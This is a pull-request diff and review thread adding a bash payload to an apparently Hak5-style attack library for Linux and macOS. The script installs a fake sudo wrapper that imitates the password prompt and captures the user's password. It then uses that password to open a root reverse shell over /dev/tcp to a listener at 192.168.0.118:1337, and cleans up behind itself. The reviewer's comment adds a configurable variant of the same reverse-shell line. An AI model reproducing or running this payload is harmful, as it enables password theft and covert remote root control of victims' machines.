payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh

```diff
@@ -0,0 +1,55 @@
+#!/bin/bash
+
+if [ ! -d ~/.config/sudo ]
+then
+    mkdir -p ~/.config/sudo
+fi
+
+if [ -f  ~/.config/sudo/sudo ]
+then
+    rm  ~/.config/sudo/sudo
+fi
+
+
+echo '#!'$SHELL >> ~/.config/sudo/sudo
+cat <<'EOF' >> ~/.config/sudo/sudo
+/usr/bin/sudo -n true 2>/dev/null
+if [ $? -eq 0 ]
+then
+    /usr/bin/sudo $@
+else
+    echo -n "[sudo] password for $USER: "
+    read -s pwd
+    echo
+    echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
+    if [ $? -eq 1 ]
+    then
+    echo "Sorry, try again."
+	sudo $@
+    else
+	/usr/bin/sudo -S $@
+	if [ -f ~/.bash_profile ]
+    then
+    rm ~/.bash_profile
+    mv ~/.bash_profile.bak ~/.bash_profile
+    else
+    rm ~/.bashrc
+    mv ~/.bashrc.bak ~/.bashrc
+    fi
+    rm ~/.config/sudo/sudo
+    echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i  > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) &
```

Comment:
I would add a bash variable to the top of your .sh script to allow for easy user configuration. For example:

```
LISTENER_IP="127.0.0.1"
LISTENER_PORT="1337"

echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i  > /dev/tcp/$LISTENER_IP/$LISTENER_PORT 0<&1 2>&1) &
```

Please do this where it applies.

Reply:
Hi @hak5peaks , 
I have updated the code as per the suggestion. Please merge the pull request.